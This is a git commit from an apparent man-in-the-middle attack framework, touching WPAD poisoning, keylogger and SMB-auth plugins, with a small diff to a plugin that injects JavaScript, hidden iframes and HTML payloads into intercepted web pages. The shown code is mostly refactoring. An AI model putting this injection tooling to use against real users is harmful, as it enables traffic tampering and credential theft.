WPAD Poisoner back online, removed options in config file and rellative code for choosing which DNS server to use. (there really was not point in keeping it)

the --basic and --force options and the EXE serving in the Responder plugin have been removed, until I can find a better way of implementing them. Modified and re-added the JS-keylogger and SMBauth plugins
2025-07-06 13:02:24 -07:00 · 2015-05-04 23:13:21 +02:00 · 2015-05-04 23:13:21 +02:00 · 5d07551a50
commit 5d07551a50
parent aa4e022ab0
13 changed files with 312 additions and 165 deletions
--- a/plugins/Inject.py
+++ b/plugins/Inject.py
@ -87,14 +87,13 @@ class Inject(CacheKill, Plugin):
                self.dtable[ip+hn] = True
                self.count += 1
                mitmf_logger.info("%s [%s] Injected malicious html" % (ip, hn))
-                return {'request': request, 'data': data}
-            else:
-                return
+        
+        return {'request': request, 'data': data}

    def _get_payload(self):
        return self._get_js() + self._get_iframe() + self.html_payload

-    def add_options(self,options):
+    def add_options(self, options):
        options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
        options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
        options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.")
@ -136,7 +135,6 @@ class Inject(CacheKill, Plugin):
        if self.per_domain:
            return not ip+hn in self.dtable

-        #print mime
        return mime.find(self.mime) != -1

    def _get_req_info(self, request):